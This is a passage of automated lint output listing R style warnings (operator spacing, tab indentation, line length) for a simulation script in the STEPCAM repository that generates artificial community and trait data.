1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L67) *style:* **Use 